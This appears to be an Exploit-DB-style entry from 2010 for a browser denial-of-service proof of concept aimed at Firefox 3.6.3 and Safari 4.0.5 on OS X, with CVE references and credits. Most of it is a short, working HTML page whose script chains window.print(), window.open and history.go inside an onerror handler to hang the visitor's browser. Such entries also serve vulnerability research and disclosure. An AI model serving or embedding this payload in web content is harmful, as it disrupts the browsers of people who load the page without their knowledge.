[] NeoSense

Multiple Browsers - 'window.print()' Denial of Service

Author: Dr_IDE
type: dos
platform: osx
port: 
date_added: 2010-05-03 
date_updated:  
verified: 1 
codes: CVE-2009-3270;CVE-2008-7246;CVE-2008-7245;CVE-2008-7244;OSVDB-58401;OSVDB-58400;OSVDB-58399;OSVDB-58398 
tags: 
aliases:  
screenshot_url:  
application_url: 

<--
Firefox 3.6.3 window.print() DoS version 2
Found By:   Dr_IDE
Credits:    Asheesh kumar Mani Tripathi
Reference:  http://www.exploit-db.com/exploits/11432
Tested On:  Firefox 3.6.3 on OSX 10.6.3; Safari 4.0.5 on OSX 10.6.3
Tested On:
-->

<html>
<title>Dr_IDE Firefox 3.6.3 & Safari 4.0.5 window.print() DoS</title>
<script>
function test(){
window.onerror=new Function(history.go(window.open(window.print())));
}

test();
</script>
</html>